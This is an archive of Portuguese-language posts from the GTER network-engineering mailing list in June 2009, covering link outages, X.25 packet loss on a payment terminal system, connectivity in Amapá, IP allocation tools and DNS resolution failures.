11:01 AM, NOC NeoGrid wrote: > > >> Bom dia! >> >> Mais algu?m com problemas com links da Diveo? >> >> Att, >> >> Dilson. >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > > > > From aquino at ecosistemas.com.br Wed Jun 10 13:53:08 2009 From: aquino at ecosistemas.com.br (Lucio de Aquino Marinho) Date: Wed, 10 Jun 2009 13:53:08 -0300 Subject: [GTER] RES: Diveo com problemas? In-Reply-To: References: Message-ID: <4A2FE4F4.50306@ecosistemas.com.br> Confirmado O problema foi bem rapido NOC NeoGrid escreveu: > Obrigado pelas respostas! O acesso j? voltou ao normal. > > Att, > > Dilson. > > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de NOC NeoGrid > Enviada em: quarta-feira, 10 de junho de 2009 11:01 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: [GTER] Diveo com problemas? > > Bom dia! > > Mais algu?m com problemas com links da Diveo? > > Att, > > Dilson. > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From enio.alcantara at rezendesistemas.com.br Thu Jun 11 20:34:37 2009 From: enio.alcantara at rezendesistemas.com.br (Enio Herenio de Alcantara) Date: Thu, 11 Jun 2009 20:34:37 -0300 Subject: [GTER] Debug PR-1000 Message-ID: Pessaol, Estou enfrentando problema de perca de pacotes e ou alterao / ingelibilidade dos pacotes enviados do pr-1000 usando protocolo X.25. Meio de comunicao: Telefonica Acredito que a linha possivelmente esteja com ruido, mas eles fazem testes de loop e no identificam nada, por fim pedi uma Analise de pacotes(com muito trabalho consegui agendar com a telefonica). Existe um software que eu consiga analisar os debug-tracer do PR-1000(COMO EXEMPLO . ANALISE DE "CLEAR")? 1) Fato j verificado a comunicao do protocolo X.25 est UP. 2) A comunicao com a administradora estabilizada, esta dando para verificar no show status da iface SWAN. Valeu pessoal ------------------------------- Cordialmente, Enio Herenio de Alcntara Rezende Sistemas Net4biz Web Solutions Fone(34) 3239-2000 http://www.rezendesistemas.com.br From filipe.m at hostdime.com.br Wed Jun 10 11:22:17 2009 From: filipe.m at hostdime.com.br (filipe mendes) Date: Wed, 10 Jun 2009 11:22:17 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <20a28b1b0906091747j56371e51wf02f7b774650e27e@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> <3e920d2f0906082106i785060ecked35c9bfa057e6f8@mail.gmail.com> <94babad20906090734l4b3b7cb8r6ee488ebc2b1db71@mail.gmail.com> <20a28b1b0906091747j56371e51wf02f7b774650e27e@mail.gmail.com> Message-ID: R$ 4.000/mb a partir de 10mb 2009/6/9 max _tor > filipe, voces vao entregar a media de quanto o mega em maraba? > > abracos > > 2009/6/9 filipe mendes > > > Participo indiretamente de um projeto que levar? internet de forma > > semelhante(via r?dio), sendo que a Marab?. Se tiver demanda( > 100mbits ) > > para Macap? posso conversar com quem tiver interesse. Tenho links (case) > > PTP > > de r?dio passando 150mbit/s (reais) com 2ms de lat?ncia em 60km. > > > > > > > > Atenciosamente > > > Filipe > > > > > > 2009/6/9 Renato Machado > > > > > > Internet via rede el?trica s? faz a ultima milha, ent?o a estrutura de > > >> backbone (wireless, fibra) que o estado n?o disp?e n?o vai ser avan?o > > >> nenhum > > >> para melhorar a situa??o j? que esse trabalho de ultima milha j? ? > feito > > >> por > > >> pequenos provedores wireless. > > >> > > >> Att, > > >> > > >> 2009/6/9 Matheus Bratfisch > > >> > > >> > Boa noite, > > >> > > > >> > N?o estou por dentro das atuais situa??es da regi?o, mas para os > > >> provedores > > >> > da regi?o junto a homologa??o da internet via rede el?trica ser? um > > >> avan?o > > >> > para a regi?o. N?o? > > >> > > > >> > Att, > > >> > -- > > >> > Matheus (X-warrior) Bratfisch. > > >> > http://matbra.com > > >> > -- > > >> > gter list https://eng.registro.br/mailman/listinfo/gter > > >> > > > >> > > >> > > >> > > >> -- > > >> Renato Silva Machado > > >> Gerente de TI > > >> > > >> + 55 75 8102-8969 Cel > > >> + 55 75 8197-6466 Cel > > >> + 55 75 3264-1825 Fixo > > >> Renato at redetuxnet.com.br > > >> > > >> Visite o nosso site - www.redetuxnet.com.br - TuxNet Materiais e > > >> Servi?os > > >> de Inform?tica LTDA. > > >> Esta mensagem e seu conte?do - inclusive anexos - s?o dedicados > > >> exclusivamente para seu(s) destinat?rio(s), podendo conter informa??es > > >> confid?nciais e/ou legalmente privilegiadas. Qualquer modifica??o, > > >> retransmiss?o, dissemina??o, impress?o ou utiliza??o n?o autorizada > fica > > >> estritamente proibida. Se voc? recebeu esta mensagem por engano, por > > favor > > >> informe o remetente e delete o material e as c?pias de sua m?quina > > >> -- > > >> gter list https://eng.registro.br/mailman/listinfo/gter > > >> > > > > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From mayk.campelo at gmail.com Wed Jun 10 11:26:27 2009 From: mayk.campelo at gmail.com (Mayk Campelo) Date: Wed, 10 Jun 2009 11:26:27 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <19834d100906100534r64c3ea6bo9b675070d903dc67@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> <20a28b1b0906091746o26b2e6b3n8f010914d2e681@mail.gmail.com> <19834d100906100534r64c3ea6bo9b675070d903dc67@mail.gmail.com> Message-ID: <2f3f2f700906100726y2e6ad14ah53433f8059a5b28a@mail.gmail.com> Gustavo, A RNP chega com 4Mbps da embratel. Abra?o, Mayk Campelo 2009/6/10 Gustavo Campos : > S? uma d?vida relacionada. > > Algu?m sabe como que a RNP chega ao Amap?? > > 2009/6/9 max _tor : >> Wenderson, tranquilo, agradeco por ter respondido. >> >> Com relacao ao grupo de empresario, nao entendi porque Belem, >> cidade com melhor investimento de backbone mais proxima? >> ou simplesmente unica alternativa? >> >> Olha Wenderson, conhecendo as historias do Carlos Slim ( >> http://pt.wikipedia.org/wiki/Carlos_Slim_Hel%C3%BA ) , >> fico meio em duvida com relacao ao seu comentario das operadoras, que nao >> querem >> investir mais para nao baixarem os precos, aposto mais em viabilidades >> tecnicas >> e quando fala em viabilidade, falo em $$, imagino que o investimento seja >> tao >> alto que so daria certo se grandes operadores se unisessem, que nao e comum, >> so quando se compram :) , mas tambem e o que acho, nao sao certezas. >> >> Quanto de banda voce opera hoje? lantecia nessa magnitude, nem pensar em >> voip >> correto? >> Com relacao a ultima milha, acho que e um processo relativo, a medida >> que tem banda, as ultimas milhas se formam, cabo (coax), FTH , radio, >> ADSL, isso ja seria questao de tempo. >> >> Acho tambem, que se um grupo forte ou um empresario independente, fizer o >> investimento >> entregando nao so internet, mas telefonia fixa e outros servicos para o >> mercado empresarial , logo nao se ganhara dinheiro com acesso a internet, >> alguma ou todas grande investira tambem, gerando concorrencia e aquecimento >> no mercado local, portanto nao vejo como salvacao mas como aceleracao. >> >> >> Mas sao apenas duvidas e discussoes correto ? >> >> Abracos >> >> >> 2009/6/8 Wenderson Souza >> >>> Boa noite, >>> >>> Conforme dito pelo colega Mayk, o qual conhe?o pessoalmente e tenho grande >>> respeito pelo seu grande conhecimento nesta ?rea de Internet entre outras, >>> existe sim este grupo de empres?rios que est? com o projeto de trazer de >>> Bel?m para Macap? atrav?s da tecnologia a r?dio (segundo meu conhecimento) >>> internet com velocidades maiores e/ou lat?ncias menores, trazendo assim a >>> t?o "esperada" banda larga. >>> >>> Apesar de (tecnicamente falando) Macap? j? ter banda larga ( >>> http://pt.wikipedia.org/wiki/Banda_larga), visto que qualquer conex?o que >>> trafega acima dos 56kbps do modem discado, j? pode-se considerar banda >>> larga. S? que as velocidades vistas nas capitais que s?o atendidas por >>> backbones em fibra ?ptica n?o s?o tang?veis em Macap? pelo custo do link >>> satelital ser muito alto. >>> >>> Querem um exemplo, Manaus, tem banda larga pelo Velox, mas j? viram o >>> custo? >>> Custo alto por usar backbone satelital. Seria o mesmo que aconteceria em >>> Macap?. ( >>> >>> http://oivelox.novaoi.com.br/portal/site/OiVelox/menuitem.ebeac1048536fb0248de9f76f26d02a0/?vgnextoid=c0456b009fcf2110VgnVCM10000090cb200aRCRD&STATE=3|AM|Amazonas >>> ) >>> >>> As operadoras de telefonia do estado do Amap? n?o t?m interesse em trazer a >>> t?o esperada fibra ?ptica para Macap?, porque isso diminuiria seus lucros >>> locais (com o acesso discado e com os altos pre?os de vendas de links >>> dedicados para governo e ISPs). E necessitaria de um investimento muito >>> alto >>> para funcionar internamente. >>> >>> Apenas trazer a fibra nao resolveria o problema local, ja que nao tem >>> infra-estrutura interna necess?ria para instalar redes xDSL. Motivo? Redes >>> sucateadas, anal?gicas (as mesmas recebidas do sistema Telebr?s na >>> privatiza??o), amplificadas. Apenas alguns bairros t?m URAs capazes de se >>> instalar um DSLAM e fazer o neg?cio acontecer. O restante ? totalmente >>> anal?gico e tem sua troca invi?vel. >>> >>> Assim como o Mayk trabalho em ISP e nossa cidade sofre muito com a falta de >>> um backbone terrestre que nos interligue com o restante do brasil com >>> lat?ncias adequadas. >>> >>> Hoje nossa lat?ncia m?nima em Macap? ? entre 550 ms a 600 ms, isso por >>> culpa >>> do acesso satelital. >>> >>> Ent?o a fibra nao resolveria? Sim e n?o, pois vindo a fibra poder?amos >>> comprar links dedicados por valores menores e repassar isso para os >>> consumidores. Velocidades maiores por pre?os menores. Mas nao teria (de >>> imediato) o ADSL dispon?vel. Mas os ISPs via r?dio conseguiriam atender >>> seus >>> clientes com melhores qualidades. >>> >>> Rede 3G existe em Macap?, mas apenas internamente. V?deo-chamada apenas >>> local. Passou para o sat?lite a m?gina p?ra. >>> >>> E aquele grupo de empres?rios ser? a salva??o? Sim e n?o, pois o monop?lio >>> continuar?(ria) existindo sem garantias de menores pre?os para os clientes >>> (que ? o que importa no final das contas). >>> >>> A salva??o, que todo mundo espera, al?m de governo, iniciativa privada e >>> consumidores, ? mesmo a chegada do linh?o de Tucuru? em Macap?, juntamente >>> com o mesmo vir? (segundo cl?usula licitat?ria) "cabos" de fibra ?ptica >>> para >>> libertar o povo amapaense desse desespero "desconectado". O problema n?mero >>> 2 ?: quem ir? explorar esse meio f?sico? >>> >>> PS: Pe?o desculpas ao amigo "Max The Tor" pelo meu e-mail anterior ter sido >>> menos "burocr?tico" e explicativo. >>> >>> >>> Atenciosamente, >>> >>> Wenderson Souza >>> e-mail: wendersonsouza at gmail.com >>> msn: wendersonsouza at msn.com >>> >>> >>> 2009/6/8 mantunes >>> >>> > Olha, >>> > >>> > tenho um amigo que trabalha na capital >>> > >>> > segundo informa??es dele.. >>> > >>> > N?o tem banda larga em Macap?. >>> > N?o tem rede 3g >>> > a sa?da ? somente via sat?lite ?o delay ? de 7milisegundos >>> > tem Telemar e Oi e provedores via r?dio.. >>> > >>> > >>> > 2009/6/8 max _tor : >>> > > Senhores, alguem na lista de amapa/macapa, que possa dar referencia de >>> > como >>> > > esta >>> > > o acesso por essa cidade/estado?? >>> > > Quem atende? OI/Embratel? outra? >>> > > Servico precario? bom? >>> > >>> -- >>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > > > > -- > -- > Gustavo Campos > Sistemas de Informa??o - UFMG > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From marcmc.gter at gmail.com Wed Jun 10 12:03:08 2009 From: marcmc.gter at gmail.com (Marcelo Cavalcante) Date: Wed, 10 Jun 2009 12:03:08 -0300 Subject: [GTER] LAN GATEWAY Message-ID: <78a5befe0906100803x2c5dd9dbj281137e114a734b3@mail.gmail.com> >--- Marcelo Cavalcante > escreveu: >>* H? arquiteturas de redes que incluem um equipamento chamado de LAN GATEWAY.* **>>* N?o vi na internet alguma explica??o clara e did?tica sobre as fun??es * **>> desse >>* tipo de equipamento. Algu?m aqui j? usou isso? Qual a aplica??o pr?tica e* **>>* vantagens?* >"saida da rede"? tipo um roteador ou uplink para outra(s) rede(s) (como a >internet)? >>* Obrigado pela aten??o,*>>* Marcelo Cavalcante * >[]s, !3runo Cabral Bruno, Vi isso em arquiteturas de seguran?a de rede. Por exemplo: Arquitetura com um router externo ligado a internet, um firewall abaixo desse router, ligado a um router interno e a uma DMZ. Esse LAN GATEWAY aparece ligado a uma rede local interna e ao router interno. Sds, Marcelo From wendersonsouza at gmail.com Wed Jun 10 21:25:28 2009 From: wendersonsouza at gmail.com (Wenderson Souza) Date: Wed, 10 Jun 2009 21:25:28 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <20a28b1b0906091746o26b2e6b3n8f010914d2e681@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> <20a28b1b0906091746o26b2e6b3n8f010914d2e681@mail.gmail.com> Message-ID: <6d3b97100906101725q9a64fadx496e7735cb8b39c8@mail.gmail.com> Boa noite max_tor, 2009/6/9 max _tor > Quanto de banda voce opera hoje? lantecia nessa magnitude, nem pensar em > voip > correto? Opero hoje com apenas 3 Mbits (CIR de 100%). Temos demanda, mas custo alto para amplia??o. > Com relacao a ultima milha, acho que e um processo relativo, a medida > que tem banda, as ultimas milhas se formam, cabo (coax), FTH , radio, > ADSL, isso ja seria questao de tempo. Concordo em g?nero, n?mero e grau. Wenderson Souza e-mail: wendersonsouza at gmail.com msn: wendersonsouza at msn.com From lscrlstld at gmail.com Thu Jun 11 22:34:22 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Thu, 11 Jun 2009 22:34:22 -0300 Subject: [GTER] RES: Debug PR-1000 In-Reply-To: References: Message-ID: Ol? Enio, uma vez apanhei muito de um sistema TEF (PR1000+X.25), na verdade estavam faltando canais l?gicos. Solicitei o aumento de canais l?gicos junto a telefonica e o problema foi resolvido. Se tiver ruido na linha o modem n?o alinha. Abs Toledo > > Pessaol, > > Estou enfrentando problema de perca de pacotes e ou alterao > / ingelibilidade dos pacotes enviados do pr-1000 usando > protocolo X.25. > > Meio de comunicao: Telefonica > > Acredito que a linha possivelmente esteja com ruido, mas eles > fazem testes de loop e no identificam nada, por fim pedi uma > > Analise de pacotes(com muito trabalho consegui agendar com a > telefonica). > > Existe um software que eu consiga analisar os debug-tracer do > PR-1000(COMO EXEMPLO . ANALISE DE "CLEAR")? > > 1) Fato j verificado a comunicao do protocolo X.25 est UP. > > 2) A comunicao com a administradora estabilizada, esta dando > para verificar no show status da iface SWAN. > > Valeu pessoal > From lscrlstld at gmail.com Thu Jun 11 22:36:41 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Thu, 11 Jun 2009 22:36:41 -0300 Subject: [GTER] RES: LAN GATEWAY In-Reply-To: <78a5befe0906100803x2c5dd9dbj281137e114a734b3@mail.gmail.com> References: <78a5befe0906100803x2c5dd9dbj281137e114a734b3@mail.gmail.com> Message-ID: LAN GATEWAY ? um termo gen?rico, que especifica um ponto de troca de tr?fego com outra rede. > > >--- Marcelo Cavalcante >gmail.com> > escreveu: > >>* H? arquiteturas de redes que incluem um equipamento chamado de LAN > GATEWAY.* > **>>* N?o vi na internet alguma explica??o clara e did?tica > sobre as fun??es > * > **>> desse > >>* tipo de equipamento. Algu?m aqui j? usou isso? Qual a aplica??o > >>pr?tica > e* > **>>* vantagens?* > > >"saida da rede"? tipo um roteador ou uplink para outra(s) > rede(s) (como > >a internet)? > > >>* Obrigado pela aten??o,*>>* Marcelo Cavalcante * > > >[]s, !3runo Cabral > > Bruno, > > Vi isso em arquiteturas de seguran?a de rede. Por exemplo: > Arquitetura com um router externo ligado a internet, um > firewall abaixo desse router, ligado a um router interno e a > uma DMZ. Esse LAN GATEWAY aparece ligado a uma rede local > interna e ao router interno. > > Sds, > > Marcelo > -- > gter list https://eng.registro.br/mailman/listinfo/gter From lscrlstld at gmail.com Fri Jun 12 12:15:28 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Fri, 12 Jun 2009 12:15:28 -0300 Subject: [GTER] RES: RES: Debug PR-1000 In-Reply-To: <4A324BE1.20400@rezendesistemas.com.br> References: <4A324BE1.20400@rezendesistemas.com.br> Message-ID: Qdo vc contrata um X.25 vc deve especificar qtos canais l?gicos vc precisa para uso simultaneo, e no router configurar o mesmo numero de canais. O router da cyclades faz o papel de proxy, recebendo os pacotes via socket/IP e redirecionando canal l?gico do X.25 Se faltar canal, o pacote ? perdido. Vc pode operar as bandeiras atravez de N redes que fazem a TEF, precisa ver quais as redes vc est? cadastrado. A comunica??o se d? atravez do sevidor TEF (concentrador SITEF), e este tamb?m tem um cadastro de porta x IP, para saber para qual canal X.25 enviar a solicita??o de TEF, isso tamb?m utilizando o banco de dados de PINs. Ent?o tudo tem que estar ajustadinho, sen?o o resultado final ? perda de pacote, ou pacote enviado para rede errada que ? considerado ingeligivel. Se o sistema TEF j? est? em produ??o eu sugiro verificar o nr de canais l?gicos contratados x canais configurados no router, e atualizar a tabala de PINs do concentrador SITEF. Se o sistema TEF est? em implanta??o utilizar ambiente de valida??o que a carrier, no caso software express, fornece. Abs Toledo > > Toledo, > > O Router ta com 5 canais e s?o somente duas bandeiras. > Voce conhe?e algum software para analise o tracer do PR-1000? > Pois para analise deste relatorio de logs do router fico na > m?o do pessoal da Software Express. > > att > > Enio > > Toledo, Luis Carlos escreveu: > > Ol? Enio, uma vez apanhei muito de um sistema TEF (PR1000+X.25), na > > verdade estavam faltando canais l?gicos. > > Solicitei o aumento de canais l?gicos junto a telefonica e > o problema > > foi resolvido. > > Se tiver ruido na linha o modem n?o alinha. > > > > Abs Toledo > > > >> Pessaol, > >> > >> Estou enfrentando problema de perca de pacotes e ou alterao / > >> ingelibilidade dos pacotes enviados do pr-1000 usando > protocolo X.25. > >> > >> Meio de comunicao: Telefonica > >> > >> Acredito que a linha possivelmente esteja com ruido, mas > eles fazem > >> testes de loop e no identificam nada, por fim pedi uma > >> > >> Analise de pacotes(com muito trabalho consegui agendar com a > >> telefonica). > >> > >> Existe um software que eu consiga analisar os debug-tracer do > >> PR-1000(COMO EXEMPLO . ANALISE DE "CLEAR")? > >> > >> 1) Fato j verificado a comunicao do protocolo X.25 est UP. > >> > >> 2) A comunicao com a administradora estabilizada, esta dando para > >> verificar no show status da iface SWAN. > >> > >> Valeu pessoal > >> > >> > > > > > > From emota at emota.com.br Fri Jun 12 13:01:48 2009 From: emota at emota.com.br (Eduardo Mota) Date: Fri, 12 Jun 2009 13:01:48 -0300 Subject: [GTER] =?iso-8859-1?q?Controle_de_aloca=E7=E3o_dos_IPs?= Message-ID: <4A327BEC.5040405@emota.com.br> Feliz dia dos namorados! J? que estou trabalhando hoje, que tal mandar e-mail ? Gostaria de saber se algu?m pode me indicar algum software / sistema para controlar a aloca??o dos meus IPs, estivo o sistema on-line do Registro.BR,. algo assim. Queria algo que tivesse, mostrasse, para quem aloquei minhas subredes, quais as dispon?veis ... algo assim. Se poss?vel at? mesmo algo que eu possa informar a banda dispon?vel do cliente e alguma observa??o especial. Algu?m indica algo? De qualquer forma, obrigado a todos. Atenciosamente, Eduardo Mota. From enio.alcantara at rezendesistemas.com.br Fri Jun 12 09:36:49 2009 From: enio.alcantara at rezendesistemas.com.br (=?ISO-8859-1?Q?Enio_Herenio_de_Alc=E2ntara?=) Date: Fri, 12 Jun 2009 09:36:49 -0300 Subject: [GTER] RES: Debug PR-1000 In-Reply-To: References: Message-ID: <4A324BE1.20400@rezendesistemas.com.br> Toledo, O Router ta com 5 canais e s?o somente duas bandeiras. Voce conhe?e algum software para analise o tracer do PR-1000? Pois para analise deste relatorio de logs do router fico na m?o do pessoal da Software Express. att Enio Toledo, Luis Carlos escreveu: > Ol? Enio, uma vez apanhei muito de um sistema TEF (PR1000+X.25), na verdade > estavam faltando canais l?gicos. > Solicitei o aumento de canais l?gicos junto a telefonica e o problema foi > resolvido. > Se tiver ruido na linha o modem n?o alinha. > > Abs Toledo > >> Pessaol, >> >> Estou enfrentando problema de perca de pacotes e ou alterao >> / ingelibilidade dos pacotes enviados do pr-1000 usando >> protocolo X.25. >> >> Meio de comunicao: Telefonica >> >> Acredito que a linha possivelmente esteja com ruido, mas eles >> fazem testes de loop e no identificam nada, por fim pedi uma >> >> Analise de pacotes(com muito trabalho consegui agendar com a >> telefonica). >> >> Existe um software que eu consiga analisar os debug-tracer do >> PR-1000(COMO EXEMPLO . ANALISE DE "CLEAR")? >> >> 1) Fato j verificado a comunicao do protocolo X.25 est UP. >> >> 2) A comunicao com a administradora estabilizada, esta dando >> para verificar no show status da iface SWAN. >> >> Valeu pessoal >> >> > > > From renato.ornelas at gmail.com Fri Jun 12 11:18:21 2009 From: renato.ornelas at gmail.com (Renato Ornelas) Date: Fri, 12 Jun 2009 11:18:21 -0300 Subject: [GTER] Problemas no acesso ao iG Message-ID: Prezados, Estamos com problemas para acessar o iG e baixaki (ambos est?o no mesmo /24). Tem mais algu?m com problemas? Algu?m poderia me dar o n?mero do NOC deles em PVT? Atenciosamente, Renato Ornelas From tobias at netconsultoria.com.br Fri Jun 12 12:34:07 2009 From: tobias at netconsultoria.com.br (Tobias P. Santos) Date: Fri, 12 Jun 2009 12:34:07 -0300 Subject: [GTER] DNS ig.com.br via CTBC Message-ID: <4A32756F.3010400@netconsultoria.com.br> Boa tarde, Possu?mos link CTBC e n?o conseguimos acessar os servidores DNS do IG (200.225.157.104 e 200.225.157.105). dig www.ig.com.br @200.225.157.104 ; <<>> DiG 9.4.2-P2 <<>> www.ig.com.br @200.225.157.104 ;; global options: printcmd ;; connection timed out; no servers could be reached Mais algu?m encontrando problema semelhante? Tobias. From maxthetor at gmail.com Fri Jun 12 11:08:24 2009 From: maxthetor at gmail.com (max _tor) Date: Fri, 12 Jun 2009 11:08:24 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <6d3b97100906101725q9a64fadx496e7735cb8b39c8@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> <20a28b1b0906091746o26b2e6b3n8f010914d2e681@mail.gmail.com> <6d3b97100906101725q9a64fadx496e7735cb8b39c8@mail.gmail.com> Message-ID: <20a28b1b0906120708s31c74b7fh9c879284600f051@mail.gmail.com> E isso mesmo ou ta errado? Habitantes Macapa: 8000.00 Habitantes Amapa: 550.000 2009/6/10 Wenderson Souza > Boa noite max_tor, > > 2009/6/9 max _tor > > > Quanto de banda voce opera hoje? lantecia nessa magnitude, nem pensar em > > voip > > correto? > > > Opero hoje com apenas 3 Mbits (CIR de 100%). Temos demanda, mas custo alto > para amplia??o. > > > > Com relacao a ultima milha, acho que e um processo relativo, a medida > > que tem banda, as ultimas milhas se formam, cabo (coax), FTH , radio, > > ADSL, isso ja seria questao de tempo. > > > Concordo em g?nero, n?mero e grau. > > > Wenderson Souza > e-mail: wendersonsouza at gmail.com > msn: wendersonsouza at msn.com > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From clayton at ntelecom.com.br Fri Jun 12 13:22:04 2009 From: clayton at ntelecom.com.br (Clayton Assis) Date: Fri, 12 Jun 2009 13:22:04 -0300 Subject: [GTER] Problemas no acesso ao iG In-Reply-To: References: Message-ID: <4A3280AC.7040805@ntelecom.com.br> Boa tarde, Temos link telefonica e CTBC, onde temos CTBC n?o conseguimos resposta dos DNS do IG: teste via Telefonica: nslookup > server 200.225.157.104 Default server: 200.225.157.104 Address: 200.225.157.104#53 > www.ig.com.br Server: 200.225.157.104 Address: 200.225.157.104#53 Name: www.ig.com.br Address: 200.226.133.74 teste via CTBC: nslookup > server 200.225.157.104 Default server: 200.225.157.104 Address: 200.225.157.104#53 > www.ig.com.br ;; connection timed out; no servers could be reached Abra?os Renato Ornelas escreveu: > Prezados, > Estamos com problemas para acessar o iG e baixaki (ambos est?o no mesmo > /24). > > Tem mais algu?m com problemas? Algu?m poderia me dar o n?mero do NOC deles > em PVT? > > Atenciosamente, > Renato Ornelas > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From rganascim at gmail.com Fri Jun 12 13:25:14 2009 From: rganascim at gmail.com (Rafael Ganascim) Date: Fri, 12 Jun 2009 13:25:14 -0300 Subject: [GTER] =?iso-8859-1?q?Controle_de_aloca=E7=E3o_dos_IPs?= In-Reply-To: <4A327BEC.5040405@emota.com.br> References: <4A327BEC.5040405@emota.com.br> Message-ID: <2f7feda40906120925j7e1c1652m434e1ab6b0c564d5@mail.gmail.com> Existe o IPPlan, que ? feito em PHP + MySQL http://iptrack.sourceforge.net/ 2009/6/12 Eduardo Mota : > Feliz dia dos namorados! > J? que estou trabalhando hoje, que tal mandar e-mail ? > > Gostaria de saber se algu?m pode me indicar algum software / sistema > para controlar a aloca??o dos meus IPs, estivo o sistema on-line do > Registro.BR,. algo assim. > > Queria algo que tivesse, mostrasse, para quem aloquei minhas subredes, > quais as dispon?veis ... algo assim. > Se poss?vel at? mesmo algo que eu possa informar a banda dispon?vel do > cliente e alguma observa??o especial. > > Algu?m indica algo? > > De qualquer forma, obrigado a todos. > > Atenciosamente, > Eduardo Mota. > > > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From roney at ntc.net.br Fri Jun 12 13:29:14 2009 From: roney at ntc.net.br (=?utf-8?B?UsO0bmV5IEVkdWFyZG8gLSBOVEM=?=) Date: Fri, 12 Jun 2009 13:29:14 -0300 (BRT) Subject: [GTER] =?utf-8?q?_Re=3A__Controle_de_aloca=C3=A7=C3=A3o_dos_IPs?= In-Reply-To: <4A327BEC.5040405@emota.com.br> References: <4A327BEC.5040405@emota.com.br> Message-ID: <62085.200.142.58.19.1244824154.squirrel@webmail.ntc.net.br> D? uma olhada aqui: http://iptrack.sourceforge.net/ []'s R?ney Eduardo > Feliz dia dos namorados! > J? que estou trabalhando hoje, que tal mandar e-mail ? > > Gostaria de saber se algu?m pode me indicar algum software / sistema > para controlar a aloca??o dos meus IPs, estivo o sistema on-line do > Registro.BR,. algo assim. > > Queria algo que tivesse, mostrasse, para quem aloquei minhas subredes, > quais as dispon?veis ... algo assim. > Se poss?vel at? mesmo algo que eu possa informar a banda dispon?vel do > cliente e alguma observa??o especial. > > Algu?m indica algo? > > De qualquer forma, obrigado a todos. > > Atenciosamente, > Eduardo Mota. > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From lscrlstld at gmail.com Fri Jun 12 13:47:33 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Fri, 12 Jun 2009 13:47:33 -0300 Subject: [GTER] RES: RES: RES: Debug PR-1000 In-Reply-To: <4A328480.6080503@rezendesistemas.com.br> References: <4A324BE1.20400@rezendesistemas.com.br> <4A328480.6080503@rezendesistemas.com.br> Message-ID: Legal q tenha conseguido resolver. > Muito obrigado pela ajuda , gra?as a persist?ncia para que > eles colocassem o analisador de pacotes conseguimos > identificar o problema e resolve-lo. E gra?as a Deus o > problema realmente estava com a telef?nica. Bom telefonica causando problema ? alguem ? regra ?ltimamente. > Conforme conversa telefonica, foi provado que o problema > estava no Ruido da linha,apresentando taxa de CRC. Ap?s a > troca do gabinete as transa??es de carga de tabelas foram > executadas com sucesso. Caramba, est?o o canal estava muito ruim mesmo, se bem que o modem nem deveria alinhar com um CRC t?o alto, mas tratando-se de telefonica tudo ? poss?vel. O X.25 apesar de ser muito antigo ? um dos melhores protocolos para circuitos de baixa qualidade e servi?os que n?o exitem largura de banda. Abs Toledo > > Vlw > > > Enio > > > > Toledo, Luis Carlos escreveu: > > Qdo vc contrata um X.25 vc deve especificar qtos canais l?gicos vc > > precisa para uso simultaneo, e no router configurar o mesmo > numero de canais. > > > > O router da cyclades faz o papel de proxy, recebendo os pacotes via > > socket/IP e redirecionando canal l?gico do X.25 > > > > Se faltar canal, o pacote ? perdido. > > > > Vc pode operar as bandeiras atravez de N redes que fazem a TEF, > > precisa ver quais as redes vc est? cadastrado. > > > > A comunica??o se d? atravez do sevidor TEF (concentrador SITEF), e > > este tamb?m tem um cadastro de porta x IP, para saber para > qual canal > > X.25 enviar a solicita??o de TEF, isso tamb?m utilizando o > banco de dados de PINs. > > > > Ent?o tudo tem que estar ajustadinho, sen?o o resultado > final ? perda > > de pacote, ou pacote enviado para rede errada que ? > considerado ingeligivel. > > > > Se o sistema TEF j? est? em produ??o eu sugiro verificar o nr de > > canais l?gicos contratados x canais configurados no router, e > > atualizar a tabala de PINs do concentrador SITEF. > > > > Se o sistema TEF est? em implanta??o utilizar ambiente de valida??o > > que a carrier, no caso software express, fornece. > > > > Abs Toledo > > > > > >> Toledo, > >> > >> O Router ta com 5 canais e s?o somente duas bandeiras. > >> Voce conhe?e algum software para analise o tracer do PR-1000? > >> Pois para analise deste relatorio de logs do router fico na m?o do > >> pessoal da Software Express. > >> > >> att > >> > >> Enio > >> > >> Toledo, Luis Carlos escreveu: > >> > >>> Ol? Enio, uma vez apanhei muito de um sistema TEF > (PR1000+X.25), na > >>> verdade estavam faltando canais l?gicos. > >>> Solicitei o aumento de canais l?gicos junto a telefonica e > >>> > >> o problema > >> > >>> foi resolvido. > >>> Se tiver ruido na linha o modem n?o alinha. > >>> > >>> Abs Toledo > >>> > >>> > >>>> Pessaol, > >>>> > >>>> Estou enfrentando problema de perca de pacotes e ou alterao / > >>>> ingelibilidade dos pacotes enviados do pr-1000 usando > >>>> > >> protocolo X.25. > >> > >>>> Meio de comunicao: Telefonica > >>>> > >>>> Acredito que a linha possivelmente esteja 